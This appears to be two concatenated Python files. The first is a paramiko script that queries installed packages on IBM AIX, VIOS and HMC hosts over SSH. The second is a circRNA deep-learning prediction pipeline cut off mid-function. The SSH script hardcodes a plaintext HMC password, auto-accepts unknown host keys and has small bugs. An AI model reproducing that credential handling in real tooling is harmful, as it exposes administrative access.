cmd2run = "echo \"lslpp -l | grep -i bes\" | oem_setup_env"
sys.tracebacklimit = 0
if len(sys.argv) < 1:
logging.error("Not enough arguments")
sys.exit(1)
ssh = paramiko.SSHClient()
ssh.load_system_host_keys()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy)
current_date = datetime.date.today()
results = []
def run_dsh(ip):
try:
if "vsa" in ip:
ssh.connect(hostname=ip, port=22, username='padmin', timeout=5)
ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd2run)
output = ssh_stdout.readlines()
for line in output:
if len(line) > 0:
results.append([ip, line])
elif "hmc" in ip:
ssh.connect(hostname=ip, port=22, username='hscroot', password="start1234", timeout=5)
ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd2run)
output = ssh_stdout.readlines()
for line in output:
if len(line) > 0:
results.append([ip, line])
else:
ssh.connect(hostname=ip, port=22, username='ibmadmin', timeout=5)
ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd2run)
output = ssh_stdout.readlines()
for line in output:
if len(line) > 0:
results.append([ip, line])
except:
print("[+] Unable to get info from " + str(ip)) + str(Exception)
finally:
pass
threads = []
for x in sys.argv[1:]:
if x:
t = threading.Thread(target=run_dsh, args=(x,))
threads.append(t)
for i in threads:
i.start()
i.join()
print("\n------------------------------------------------------\n")
for line in results:
if line:
print(str(line[0]).rstrip('\n') + ": " + str(line[1]).rstrip('\n'))
print("\n------------------------------------------------------\n")
|
circDeep.py
|
import keras
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.layers import Dense, Dropout, Merge, Input
from keras.callbacks import ModelCheckpoint, EarlyStopping
from sklearn import metrics
from keras import optimizers
from gensim.models import Word2Vec
from gensim.models.word2vec import LineSentence
from keras.layers import Input, Embedding, LSTM, Convolution1D
from sklearn.preprocessing import StandardScaler, MinMaxScaler
from keras.layers import MaxPooling1D, AveragePooling1D, Bidirectional
from keras.layers.advanced_activations import PReLU
from keras.layers.normalization import BatchNormalization
from sklearn.externals import joblib
import gensim, logging
import multiprocessing
import random
from keras.utils import np_utils, generic_utils
from keras.layers.core import Dense, Dropout, Activation, Flatten
from keras.layers import merge, Dropout, Flatten, Dense, Permute
from keras.models import Model, Sequential
import matplotlib.pyplot as plt
from sklearn.preprocessing import LabelEncoder
import os
import pysam
from collections import defaultdict
import os
import argparse
import timeit
import re
import pyBigWig
import tempfile
import sys
import hashlib
from multiprocessing import Process
import keras
from sklearn import metrics
from gensim.models.word2vec import LineSentence
import gensim, logging
import pickle
import numpy as np
import keras
from keras.layers import Dense, LSTM, Dropout, Bidirectional
import gensim, logging
from keras.models import load_model
from keras.layers import Concatenate
def suffle_text(file_input, file_output):
f = open(file_input)
oo = open(file_output, 'w')
entire_file = f.read()
file_list = entire_file.split('\n')
num_lines = len(file_list)
random_nums = random.sample(xrange(num_lines), num_lines)
for i in random_nums:
oo.write(file_list[i] + "\n")
oo.close()
f.close()
def seq2ngram(seqs, k, s, dest, wv):
f = open(seqs)
lines = f.readlines()
f.close()
list22 = []
print('need to n-gram %d lines' % len(lines))
f = open(dest, 'w')
for num, line in enumerate(lines):
if num < 200000:
line = line[:-1].lower() # remove '\n' and lower ACGT
l = len(line) # length of line
list2 = []
for i in range(0, l, s):
if i + k >= l + 1:
break
list2.append(line[i:i + k])
f.write(''.join(line[i:i + k]))
f.write(' ')
f.write('\n')
list22.append(convert_data_to_index(list2, wv))
f.close()
return list22
def convert_sequences_to_index(list_of_seqiences, wv):
ll = []
for i in range(len(list_of_seqiences)):
ll.append(convert_data_to_index(list_of_seqiences[i], wv))
return ll
def convert_data_to_index(string_data, wv):
index_data = []
for word in string_data:
if word in wv:
index_data.append(wv.vocab[word].index)
return index_data
def seq2ngram2(seqs, k, s, dest):
f = open(seqs)
lines = f.readlines()
f.close()
print('need to n-gram %d lines' % len(lines))
f = open(dest, 'w')
for num, line in enumerate(lines):
if num < 100000:
line = line[:-1].lower() # remove '\n' and lower ACGT
l = len(line) # length of line
for i in range(0, l, s):
if i + k >= l + 1:
break
f.write(''.join(line[i:i + k]))
f.write(' ')
f.write('\n')
f.close()
def word2vect(k, s, vector_dim, root_path, pos_sequences):
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
seq2ngram2(pos_sequences, k, s, 'seq_pos_' + str(k) + '_' + str(s) + '.txt')
sentences = LineSentence('seq_pos_' + str(k) + '_' + str(s) + '.txt')
mode1 = gensim.models.Word2Vec(sentences, iter=20, window=int(18 / s), min_count=50, size=vector_dim,
workers=multiprocessing.cpu_count())
mode1.save(root_path + 'word2vec_model' + '_' + str(k) + '_' + str(s) + '_' + str(vector_dim))
def build_class_file(np, ng, class_file):
with open(class_file, 'w') as outfile:
outfile.write('label' + '\n')
for i in range(np):
outfile.write('1' + '\n')
for i in range(ng):
outfile.write('0' + '\n')
def build_ACNN_BLSTM_model(k, s, vector_dim, root_path, MAX_LEN, pos_sequences, neg_sequences, seq_file, class_file,model_dir):
model1 = gensim.models.Word2Vec.load(
model_dir + 'word2vec_model' + '_' + str(k) + '_' + str(s) + '_' + str(vector_dim))
pos_list = seq2ngram(pos_sequences, k, s, 'seq_pos_' + str(k) + '_' + str(s) + '.txt', model1.wv)
with open(str(k) + '_' + str(s) + 'listpos.pkl', 'wb') as pickle_file:
pickle.dump(pos_list, pickle_file, protocol=pickle.HIGHEST_PROTOCOL)
# with open(str(k) + '_' + str(s) + 'listpos.pkl', 'rb') as f:
# pos_list = pickle.load(f)
# pos_list = pos_list[:250]
# print(str(len(pos_list)))
neg_list = seq2ngram(neg_sequences, k, s, 'seq_neg_' + str(k) + '_' + str(s) + '.txt', model1.wv)
with open(str(k) + '_' + str(s) + 'listneg.pkl', 'wb') as pickle_file:
pickle.dump(neg_list, pickle_file, protocol=pickle.HIGHEST_PROTOCOL)
# with open(str(k) + '_' + str(s) + 'listneg.pkl', 'rb') as f1:
# neg_list = pickle.load(f1)
# neg_list = neg_list[:200]
# print (str(len(neg_list)))
seqs = pos_list + neg_list
X = pad_sequences(seqs, maxlen=MAX_LEN)
y = np.array([1] * len(pos_list) + [0] * len(neg_list))
build_class_file(len(pos_list), len(neg_list), class_file)
X1 = X
n_seqs = len(seqs)
indices = np.arange(n_seqs)
np.random.shuffle(indices)
X = X[indices]
y = y[indices]
n_tr = int(n_seqs * 0.8)
X_train = X[:n_tr]
y_train = y[:n_tr]
X_valid = X[n_tr:]
y_valid = y[n_tr:]
embedding_matrix = np.zeros((len(model1.wv.vocab), vector_dim))
for i in range(len(model1.wv.vocab)):
embedding_vector = model1.wv[model1.wv.index2word[i]]
if embedding_vector is not None:
embedding_matrix[i] = embedding_vector
model = Sequential()
model.add(Embedding(input_dim=embedding_matrix.shape[0],
output_dim=embedding_matrix.shape[1],
weights=[embedding_matrix],
input_length=MAX_LEN,
trainable=True))
model.add(Dropout(0.1))
# model.add(Convolution1D(nb_filter = 100,filter_length=1,activation='relu',border_mode = 'valid'))
model.add(Convolution1D(nb_filter=100,
filter_length=7,
activation='relu',
border_mode='valid'))
model.add(MaxPooling1D(4, 4))
model.add(Dropout(0.1))
# model.add(Convolution1D(nb_filter = 80,filter_length=1,activation='relu',border_mode = 'valid'))
model.add(Convolution1D(100, 1, activation='relu'))
model.add(MaxPooling1D(2, 2))
model.add(Dropout(0.1))
model.add(Bidirectional(LSTM(100, consume_less='gpu')))
model.add(Dropout(0.1))
model.add(Dense(80, activation='relu'))
model.add(Dropout(0.1))
model.add(Dense(20, activation='relu', name='myfeatures'))
model.add(Dropout(0.1))
model.add(Dense(1, activation='sigmoid'))
sgd = optimizers.SGD(lr=0.02, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(loss='mean_squared_error', optimizer=sgd, metrics=['accuracy'])
print(model.summary())
# model.compile(loss='binary_crossentropy', optimizer='rmsprop', metrics=['accuracy'])
# print(model.summary())
checkpointer = ModelCheckpoint(
filepath=model_dir+'bestmodel_ACNN_BLSTM_' + str(k) + ' ' + str(s) + ' ' + str(vector_dim) + str(MAX_LEN) + '.hdf5',
verbose=1,
save_best_only=True)
earlystopper = EarlyStopping(monitor='val_loss', patience=6, verbose=1)
print('Training model...')
history = model.fit(X_train, y_train, nb_epoch=2, batch_size=128, shuffle=True,
validation_data=(X_valid, y_valid),
callbacks=[checkpointer, earlystopper],
verbose=1)
# print(history.history.keys())
# summarize history for accuracy
# plt.figure()
# plt.plot(history.history['acc'])
# plt.plot(history.history['val_acc'])
# plt.title('model accuracy')
# plt.ylabel('accuracy')
# plt.xlabel('epoch')
# plt.legend(['train', 'test'], loc='upper left')
# plt.savefig('C:/Users/mohamed/Documents/text_mining/finaldata/myaccuracy-drop='+str(int(ls*10))+'s='+str(s)+'vectrdim='+str(vector_dim))
# summarize history for loss
# plt.figure()
# plt.plot(history.history['loss'])
# plt.plot(history.history['val_loss'])
# plt.title('model loss')
# plt.ylabel('loss')
# plt.xlabel('epoch')
# plt.legend(['train', 'test'], loc='upper left')
# plt.savefig('C:/Users/mohamed/Documents/text_mining/finaldata/myloss-drop='+str(int(ls*10))+'s='+str(s)+'vectrdim='+str(vector_dim))
# tresults = model.evaluate(X_test, y_test)
# print (tresults)
# y_pred = model.predict(X_test, batch_size=32, verbose=1)
# y = y_test
# print ('Calculating AUC...')
# auroc = metrics.roc_auc_score(y, y_pred)
# auprc = metrics.average_precision_score(y, y_pred)
# print (auroc, auprc)
intermediate_layer_model = Model(inputs=model.input,
outputs=model.get_layer('myfeatures').output)
np.savetxt(seq_file, intermediate_layer_model.predict(X1), delimiter=" ")
def extract_ACNN_BLSTM(k, s, vector_dim, root_path, MAX_LEN, testing_sequences, seq_file,model_dir):
model1 = gensim.models.Word2Vec.load(
model_dir + 'word2vec_model' + '_' + str(k) + '_' + str(s) + '_' + str(vector_dim))
seqs = seq2ngram(testing_sequences, k, s, 'seq_' + str(k) + '_' + str(s) + '.txt', model1.wv)
X = pad_sequences(seqs, maxlen=MAX_LEN)
model = load_model(model_dir+'bestmodel_ACNN_BLSTM_' + str(k) + ' ' + str(s) + ' ' + str(vector_dim) + str(MAX_LEN) + '.hdf5')
intermediate_layer_model = Model(inputs=model.input,
outputs=model.get_layer('myfeatures').output)
np.savetxt(seq_file, intermediate_layer_model.predict(X), delimiter=" ")
def bigwig_score_list(bw, chr, start, end):
score = []
kk = bw.intervals(chr, start, end)
if kk != None:
for t in bw.intervals(chr, start, end):
score.append(t[2])
if len(score) == 0:
for i in range(start, end):
score.append(0)
return score
def bigwig_mean(bw, chr, start, end):
score_sum = 0
mean_score = 0
kk = bw.intervals(chr, start, end)
if kk != None:
for t in bw.intervals(chr, start, end):
score_sum += t[2]
else:
print('yes')
if (end - start) != 0:
mean_score = score_sum / (end - start)
else:
mean_score = 0
return mean_score
def extract_exons(gtf_file):
gtf = open(gtf_file, 'r');
exons = defaultdict(list)
for line in gtf: ## process each line
if line[0] != '#':
ele = line.strip().split('\t');
if len(ele) > 7:
if ele[2] == 'exon':
chr = (ele[0])
strand = (ele[6])
start = int(ele[3])
end = int(ele[4])
exons[chr + strand].append([start, end])
return exons
def get_processed_conservation_score(score_whole_seq, thres):
ls = len(score_whole_seq)
score_array = np.array(score_whole_seq)
con_arr = (score_array >= thres)
con_str = ''
for val in con_arr:
if val:
con_str = con_str + '1'
else:
con_str = con_str + '0'
sat8_len = con_str.count('11111111')
sat7_len = con_str.count('1111111')
sat_6len = con_str.count('111111')
sat5_len = con_str.count('11111')
return float(sat5_len) * 1000 / ls, float(sat_6len) * 1000 / ls, float(sat7_len) * 1000 / ls, float(
sat8_len) * 1000 / ls
def point_overlap(min1, max1, min2, max2):
return max(0, min(max1, max2) - max(min1, min2))
def extract_feature_conservation_CCF(fasta_file, bigwig, gtf_file, out):
fp = open(fasta_file, 'r')
bw = pyBigWig.open(bigwig)
exons = extract_exons(gtf_file)
fw = open(out, 'w')
ii = 0
for line in fp:
ii = ii + 1
ele = line.strip().split(' ')
chr_name = ele[0]
start = int(ele[1])
end = int(ele[2]) - 1
strand = ele[3]
list_all_exons = exons[chr_name + strand]
list_exons = []
score = []
tt = True
for i in range(len(list_all_exons)):
start_exon = list_all_exons[i][0]
end_exon = list_all_exons[i][1]
if point_overlap(start_exon, end_exon, start, end):
for i in range(len(list_exons)):
if list_exons[i][0] == start_exon and list_exons[i][1] == end_exon:
tt = False
if tt:
list_exons.append((start_exon, end_exon))
b = []
for begin, end in sorted(list_exons):
if b and b[-1][1] >= begin - 1:
b[-1][1] = max(b[-1][1], end)
else:
b.append([begin, end])
list_exons = b
if len(list_exons) == 0:
list_exons.append([start, end])
for i in range(len(list_exons)):
score.append(bigwig_mean(bw, chr_name, list_exons[i][0], list_exons[i][1]))
score_array = np.array(score)
mean_score = score_array.mean()
max_score = score_array.max()
median_score = np.median(score_array)
fw.write(str(mean_score) + ' ' + str(max_score) + ' ' + str(
median_score))
score_whole_seq = bigwig_score_list(bw, chr_name, start, end)
l5, l6, l7, l8 = get_processed_conservation_score(score_whole_seq, 0.5)
fw.write(' ' + str(l5) + ' ' + str(l6) + ' ' + str(l7) + ' ' + str(l8))
l5, l6, l7, l8 = get_processed_conservation_score(score_whole_seq, 0.6)
fw.write(' ' + str(l5) + ' ' + str(l6) + ' ' + str(l7) + ' ' + str(l8))
l5, l6, l7, l8 = get_processed_conservation_score(score_whole_seq, 0.7)
fw.write(' ' + str(l5) + ' ' + str(l6) + ' ' + str(l7) + ' ' + str(l8))
l5, l6, l7, l8 = get_processed_conservation_score(score_whole_seq, 0.8)
fw.write(' ' + str(l5) + ' ' + str(l6) + ' ' + str(l7) + ' ' + str(l8))
l5, l6, l7, l8 = get_processed_conservation_score(score_whole_seq, 0.9)
fw.write(' ' + str(l5) + ' ' + str(l6) + ' ' + str(l7) + ' ' + str(l8))
fw.write('\n')
fp.close()
bw.close()
def complement(seq):
complement = {'A': 'T', 'C': 'G', 'G': 'C', 'T': 'A', 'N': 'N'}
complseq = [complement[base] for base in seq]
return complseq
def reverse_complement(seq):
seq = list(seq)
seq.reverse()
return ''.join(complement(seq))
def bed_to_fasta(bed_file, fasta_file, sequence_file, genome_fasta):
bed = open(bed_file, 'r');
output = open(fasta_file, 'w');
output2 = open(sequence_file, 'w');
genome_fa = pysam.FastaFile(genome_fasta)
for line in bed:
values = line.split()
chr_n = values[0]
start = int(values[1])
end = int(values[2])
strand = values[3]
seq = genome_fa.fetch(chr_n, start, end)
seq = seq.upper()
if strand == '-':
seq = reverse_complement(seq)
output.write('>' + ':'.join([chr_n, str(start), str(end), strand]) + '\n')
output.write(seq + '\n')
output2.write(seq + '\n')
def extract_rcm(fasta_file, genome, out, kk, jj):
genome_fa = pysam.FastaFile(genome)
fp = open(fasta_file, 'r')
fw = open(out, 'w')
indices, number_kmers = get_dictionary_kmers(jj)
numline = 0
for line in fp:
ele = line.strip().split(':')
if line[0] == '>':
numline = numline + 1
if numline % 10 == 0:
print('%d lines made' % numline)
chr_name = ele[0][1:]
start = int(ele[1])
end = int(ele[2]) - 1
strand = ele[3]
scores = get_rcm_score(chr_name, strand, start, end, genome_fa, kk, jj, indices, number_kmers)
for jjj in range(len(scores)):
fw.write(str(scores[jjj]) + ' ')
fw.write('\n')
def extract_rcm2(fasta_file, genome, out, kk, jj):
genome_fa = pysam.FastaFile(genome)
fp = open(fasta_file, 'r')
fw = open(out, 'w')
indices, number_kmers = get_dictionary_kmers(jj)
numline = 0
for line in fp:
ele = line.strip().split(':')
if line[0] == '>':
numline = numline + 1
if numline % 10 == 0:
print('%d lines made' % numline)
chr_name = ele[0][1:]
start = int(ele[1])
end = int(ele[2]) - 1
strand = ele[3]
scores = get_rcm_score2(chr_name, strand, start, end, genome_fa, kk, jj, indices, number_kmers)
for jjj in range(len(scores)):
fw.write(str(scores[jjj]) + ' ')
fw.write('\n')
def match_score(alpha, beta):
match_award = 12
mismatch_penalty = -2
if alpha == beta:
return match_award
else:
return mismatch_penalty
def zeros(shape):
retval = []
for x in range(shape[0]):
retval.append([])
for y in range(shape[1]):
retval[-1].append(0)
return retval
def water(seq1, seq2):
m, n = len(seq1) - 1, len(seq2) - 1 # length of two sequences
# Generate DP table and traceback path pointer matrix
score = zeros((m + 1, n + 1)) # the DP table
pointer = zeros((m + 1, n + 1)) # to store the traceback path
max_score_500 = 0
max_score_750 = 0
max_score_1000 = 0
max_score_1250 = 0
# initial maximum score in DP table
# Calculate DP table and mark pointers
gap_penalty = -12
for i in range(1, min(m + 1, 1250)):
for j in range(1, min(n + 1, 1250)):
score_diagonal = score[i - 1][j - 1] + match_score(seq1[i], seq2[j]);
score[i][j] = max(0, score_diagonal)
if score[i][j] >= max_score_500 and i <= 500 and j <= 500:
max_score_500 = score[i][j];
if score[i][j] >= max_score_750 and i <= 750 and j <= 750:
max_score_750 = score[i][j];
if score[i][j] >= max_score_1000 and i <= 1000 and j <= 1000:
max_score_1000 = score[i][j];
if score[i][j] >= max_score_1250 and i <= 1250 and j <= 1250:
max_score_1250 = score[i][j];
return [max_score_500, max_score_750, max_score_1000, max_score_1250]
def get_rcm_score(chrr, strand, start, end, genome_fa, wsize, motifsize, indices, number_kmers):
fi_seq = genome_fa.fetch(chrr, start - wsize, start).upper()
si_seq = genome_fa.fetch(chrr, end, end + wsize).upper()
if strand == '-':
fi_seq = reverse_complement(fi_seq)
si_seq = reverse_complement(si_seq)
fi_seq_ind = sequence_to_indices(fi_seq, indices, motifsize)
fsi_seq_ind = sequence_to_indices_rc(si_seq, indices, motifsize)
results = water(fi_seq_ind, fsi_seq_ind)
return results
def get_rcm_score2(chrr, strand, start, end, genome_fa, wsize, motifsize, indices, number_kmers):
fi_seq = genome_fa.fetch(chrr, start - wsize, start).upper()
si_seq = genome_fa.fetch(chrr, end, end + wsize).upper()
if strand == '-':
fi_seq = reverse_complement(fi_seq)
si_seq = reverse_complement(si_seq)
fi_seq_ind = sequence_to_indices(fi_seq, indices, motifsize)
fsi_seq_ind = sequence_to_indices_rc(si_seq, indices, motifsize)
results2 = []
for size in [500, 750, 1000, 1250, 1500, 1750, 1990]:
results2.append(absolute_number_rcm(fi_seq_ind[:size], fsi_seq_ind[2000 - size:], number_kmers))
# ss=extract_absolute_number_rcm(fi_seq_ind,fsi_seq_ind):
return results2
def absolute_number_rcm(fi_seq_ind, fsi_seq_ind, end):
sum = 0
for i in range(end):
sum = sum + min(fi_seq_ind.count(i), fsi_seq_ind.count(i))
return sum
def sequence_to_indices(sequence, indices, k):
seq_list = []
for i in range(len(sequence) - k):
seq_list.append(indices[sequence[i:i + k]])
return seq_list
def sequence_to_indices_rc(sequence, indices, k):
seq_list = []
for i in range(len(sequence) - k):
seq_list.append(indices[reverse_complement(sequence[i:i + k])])
return seq_list
def get_dictionary_kmers(k):
indices = defaultdict(int)
chars = ['A', 'C', 'G', 'T']
base = len(chars)
end = len(chars) ** k
for i in range(0, end):
seq = ''
n = i
for j in range(k):
seq = seq + chars[n % base]
n = int(n / base)
indices[seq] = i
return indices, end
def extract_rcm_features(pos_data_fasta, neg_data_fasta, genome, rcm_file, data_dir):
if not os.path.exists(data_dir + 'rcm/'):
os.makedirs(data_dir + 'rcm/')
proc = []
for k in [1, 2, 3]:
out = data_dir + 'rcm/pos_rcm1_' + str(k)
print(str(k))
p = Process(target=extract_rcm, args=(pos_data_fasta, genome, out, 1250, k))
proc.append(p)
# extract_rcm(pos_data_fasta, genome, out, 1000, 3)
for p in proc:
p.start()
proc2 = []
for k in [1, 2, 3]:
out = data_dir + 'rcm/neg_rcm1_' + str(k)
print(str(k))
p2 = Process(target=extract_rcm, args=(neg_data_fasta, genome, out, 1250, k))
proc2.append(p2)
# extract_rcm(pos_data_fasta, genome, out, 1000, k)
for p2 in proc2:
p2.start()
proc3 = []
for k in [3, 4, 5, 6]:
out = data_dir + 'rcm/pos_rcm2_' + str(k)
print(str(k))
p3 = Process(target=extract_rcm2, args=(pos_data_fasta, genome, out, 2000, k))
proc3.append(p3)
# extract_rcm(pos_data_fasta, genome, out, 1000, 3)
for p3 in proc3:
p3.start()
proc4 = []
for k in [3, 4, 5, 6]:
out = data_dir + 'rcm/neg_rcm2_' + str(k)
print(str(k))
p4 = Process(target=extract_rcm2, args=(neg_data_fasta, genome, out, 2000, k))
proc4.append(p4)
# extract_rcm(pos_data_fasta, genome, out, 1000, k)
for p4 in proc4:
p4.start()
for p in proc:
p.join()
for p2 in proc2:
p2.join()
for p3 in proc3:
p3.join()
for p4 in proc4:
p4.join()
concatenate_rcm_files(rcm_file, data_dir)
def concatenate_rcm_files(rcm_file, data_dir):
file_dir = data_dir + 'rcm/'
root_range = [1, 2]
K_range = {1: [1, 2, 3],
2: [3, 4, 5, 6]}
# dict to store the data as the files a read out
lines = {'pos': list(), 'neg': list(), 'header': ""}
def append_data(filename, column_prefix, sign):
"""
take each line from file, and append that line to
respective string in lines[sign]
"""
with open(os.path.join(file_dir, filename)) as f:
# initialize the lines list if first time
new_lines = f.readlines()
if len(lines[sign]) == 0:
lines[sign] = ["" for _ in range(len(new_lines))]
# append every line to lines
last_line = str()
for i, (line, new_data) in enumerate(zip(lines[sign], new_lines)):
lines[sign][i] += new_data.strip() + ' '
last_line = new_data.strip()
# append headers
if sign == 'pos':
for i in range(len(last_line.split(' '))):
lines['header'] += column_prefix + '_' + str(i + 1) + ' '
# interate through all file names and call append_data on each
for root in root_range:
for K in K_range[root]:
for sign in ['pos', 'neg']:
column_prefix = str(root) + '_' + str(K)
filename = sign + '_rcm' + column_prefix
print(filename)
append_data(filename, column_prefix, sign)
# write to outfile.txt in pwd
with open(rcm_file, 'w') as outfile:
outfile.write(lines['header'] + '\n')
for line in lines['pos']:
outfile.write(line + '\n')
for line in lines['neg']:
outfile.write(line + '\n')
def extract_rcm_features_testing(data_fasta, genome, rcm_file, data_dir):
if not os.path.exists(data_dir + 'rcm/'):
os.makedirs(data_dir + 'rcm/')
proc = []
for k in [1, 2, 3]:
out = data_dir + 'rcm/rcm1_' + str(k)
p = Process(target=extract_rcm, args=(data_fasta, genome, out, 1250, k))
proc.append(p)
# extract_rcm(pos_data_fasta, genome, out, 1000, 3)
for p in proc:
p.start()
proc3 = []
for k in [3, 4, 5, 6]:
out = data_dir + 'rcm/rcm2_' + str(k)
print(str(k))
p3 = Process(target=extract_rcm2, args=(data_fasta, genome, out, 2000, k))
proc3.append(p3)
# extract_rcm(pos_data_fasta, genome, out, 1000, 3)
for p3 in proc3:
p3.start()
for p in proc:
p.join()
for p3 in proc3:
p3.join()
print('start concatenate')
concatenate_rcm_files_testing(rcm_file, data_dir)
def concatenate_rcm_files_testing(rcm_file, data_dir):
file_dir = data_dir + 'rcm/'
root_range = [1, 2]
K_range = {1: [1, 2, 3],
2: [3, 4, 5, 6]}
# dict to store the data as the files a read out
lines = {'data': list(), 'header': ""}
def append_data(filename, column_prefix, sign='data'):
"""
take each line from file, and append that line to
respective string in lines[sign]
"""
with open(os.path.join(file_dir, filename)) as f:
# initialize the lines list if first time
new_lines = f.readlines()
if len(lines[sign]) == 0:
lines[sign] = ["" for _ in range(len(new_lines))]
# append every line to lines
last_line = str()
for i, (line, new_data) in enumerate(zip(lines[sign], new_lines)):
lines[sign][i] += new_data.strip() + ' '
last_line = new_data.strip()
# append headers
if sign == 'data':
for i in range(len(last_line.split(' '))):
lines['header'] += column_prefix + '_' + str(i + 1) + ' '
# interate through all file names and call append_data on each
for root in root_range:
for K in K_range[root]:
column_prefix = str(root) + '_' + str(K)
filename = 'rcm' + column_prefix
print(filename)
append_data(filename, column_prefix, 'data')
# write to outfile.txt in pwd
with open(rcm_file, 'w') as outfile:
outfile.write(lines['header'] + '\n')
for line in lines['data']:
outfile.write(line + '\n')
def concatenate_cons_files(pos_conservation_feature_file, neg_conservation_feature_file, cons_file):
filenames = [pos_conservation_feature_file, neg_conservation_feature_file]
with open(cons_file, 'w') as outfile:
for fname in filenames:
with open(fname) as infile:
outfile.write(infile.read())
def extract_features_testing(testing_bed, genome, bigwig, gtf, data_dir,model_dir):
cons_file = data_dir + 'conservation_features_test.txt'
rcm_file = data_dir + 'rcm_features_test.txt'
seq_file = data_dir + 'seq_features_test.txt'
testing_fasta = testing_bed + '.fasta'
testing_sequences = testing_bed + '.seq.txt'
bed_to_fasta(testing_bed,testing_fasta ,testing_sequences, genome)
extract_feature_conservation_CCF(testing_bed, bigwig, gtf, cons_file)
extract_rcm_features_testing(testing_fasta, genome,rcm_file,data_dir)
extract_ACNN_BLSTM(3, 1, 40, data_dir, 8000, testing_sequences, seq_file,model_dir)
return testing_fasta, testing_sequences, cons_file, rcm_file, seq_file
def extract_features_training(pos_data_bed, neg_data_bed, genome, bigwig, gtf, data_dir,model_dir):
cons_file = data_dir + 'conservation_features.txt'
rcm_file = data_dir + 'rcm_features.txt'
seq_file = data_dir + 'seq_features.txt'
class_file = data_dir + 'class.txt'
pos_data_fasta = pos_data_bed + '.fasta'
pos_sequences = pos_data_bed + '.seq.txt'
neg_data_fasta = neg_data_bed + '.fasta'
neg_sequences = neg_data_bed + '.seq.txt'
pos_conservation_feature_file = pos_data_bed + '.cons'
neg_conservation_feature_file = neg_data_bed + '.cons'
bed_to_fasta(pos_data_bed,pos_data_fasta ,pos_sequences, genome)
bed_to_fasta(neg_data_bed, neg_data_fasta,neg_sequences, genome)
extract_feature_conservation_CCF(neg_data_bed, bigwig, gtf, neg_conservation_feature_file)
extract_feature_conservation_CCF(pos_data_bed, bigwig,gtf,pos_conservation_feature_file)
concatenate_cons_files(pos_conservation_feature_file,neg_conservation_feature_file,cons_file)
extract_rcm_features(pos_data_fasta, neg_data_fasta, genome,rcm_file,data_dir)
word2vect(3, 1, 40, model_dir, pos_sequences)
print('11111')
build_ACNN_BLSTM_model(3, 1, 40, data_dir, 8000, pos_sequences, neg_sequences, seq_file, class_file,model_dir)
print('22222')
return pos_data_fasta, pos_sequences, neg_data_fasta, neg_sequences, cons_file, rcm_file, seq_file
def load_data(path, seq=True, rcm=True, cons=False, test=False, cons_file=None, rcm_file=None, seq_file=None):
"""
Load data matrices from the specified folder.
"""
data = dict()
if seq: data["seq"] = np.loadtxt(seq_file, delimiter=' ', skiprows=0)
if rcm: data["rcm"] = np.loadtxt(rcm_file, skiprows=1)
if cons: data["cons"] = np.loadtxt(cons_file, skiprows=0)
if test:
data["Y"] = []
else:
data["Y"] = np.loadtxt(path + 'class.txt', skiprows=1)
print('data loaded')
return data
def split_training_validation(classes, validation_size=0.2, shuffle=False):
"""split sampels based on balnace classes"""
num_samples = len(classes)
classes = np.array(classes)
classes_unique = np.unique(classes)
num_classes = len(classes_unique)
indices = np.arange(num_samples)
# indices_folds=np.zeros([num_samples],dtype=int)
training_indice = []
training_label = []
validation_indice = []
validation_label = []
print(str(classes_unique))
for cl in classes_unique:
indices_cl = indices[classes == cl]
num_samples_cl = len(indices_cl)
# split this class into k parts
if shuffle:
random.shuffle(indices_cl) # in-place shuffle
# module and residual
num_samples_validation = int(num_samples_cl * validation_size)
res = num_samples_cl - num_samples_validation
training_indice = training_indice + [val for val in indices_cl[num_samples_validation:]]
training_label = training_label + [cl] * res
validation_indice = validation_indice + [val for val in indices_cl[:num_samples_validation]]
validation_label = validation_label + [cl] * num_samples_validation
training_index = np.arange(len(training_label))
random.shuffle(training_index)
training_indice = np.array(training_indice)[training_index]
training_label = np.array(training_label)[training_index]
validation_index = np.arange(len(validation_label))
random.shuffle(validation_index)
validation_indice = np.array(validation_indice)[validation_index]
validation_label = np.array(validation_label)[validation_index]
print(np.shape(training_indice))
print(np.shape(training_label))
print(np.shape(validation_indice))
print(np.shape(validation_label))
return training_indice, training_label, validation_indice, validation_label
def preprocess_data(X, scaler=None, stand=False):
if not scaler:
if stand:
scaler = StandardScaler()
else:
scaler = MinMaxScaler()
scaler.fit(X)
X = scaler.transform(X)
return X, scaler
def preprocess_labels(labels, encoder=None, categorical=True):
if not encoder:
encoder = LabelEncoder()
encoder.fit(labels)
y = encoder.transform(labels).astype(np.int32)
if categorical:
y = np_utils.to_categorical(y)
return y, encoder
def get_rnn_fea(train, sec_num_hidden=128, num_hidden=128):
model = Sequential()
# model.add(Dense(num_hidden, input_dim=train.shape[1], activation='relu'))
model.add(Dense(num_hidden, input_shape=(train.shape[1],), activation='relu'))
model.add(PReLU())
model.add(BatchNormalization())
model.add(Dropout(0.5))
model.add(Dense(num_hidden, input_dim=num_hidden, activation='relu'))
# model.add(Dense(num_hidden, input_shape=(num_hidden,), activation='relu'))
model.add(PReLU())
model.add(BatchNormalization())
# model.add(Activation('relu'))
model.add(Dropout(0.5))
return model
def train_circDeep(data_dir, model_dir, genome, bigwig, gtf, positive_bed, negative_bed, seq=True, rcm=True, cons=True,extract_features=True):
if extract_features:
pos_data_fasta, pos_sequences, neg_data_fasta, neg_sequences, cons_file, rcm_file, seq_file = extract_features_training(
positive_bed, negative_bed, genome, bigwig, gtf, data_dir,model_dir)
else:
cons_file = data_dir + 'conservation_features.txt'
rcm_file = data_dir + 'rcm_features.txt'
seq_file = data_dir + 'seq_features.txt'
training_data = load_data(data_dir, seq, rcm, cons, False, cons_file, rcm_file, seq_file)
print('training', len(training_data))
seq_hid = 20
rcm_hid = 256
cons_hid = 64
training_indice, training_label, validation_indice, validation_label = split_training_validation(training_data["Y"])
print('split done')
if seq:
print(np.shape(training_data["seq"]))
seq_data, seq_scaler = preprocess_data(training_data["seq"])
print(np.shape(seq_data))
joblib.dump(seq_scaler, os.path.join(model_dir, 'seq_scaler.pkl'))
seq_train = seq_data[training_indice]
seq_validation = seq_data[validation_indice]
seq_net = get_rnn_fea(seq_train, sec_num_hidden=seq_hid, num_hidden=seq_hid * 2)
seq_data = []
training_data["seq"] = []
if rcm:
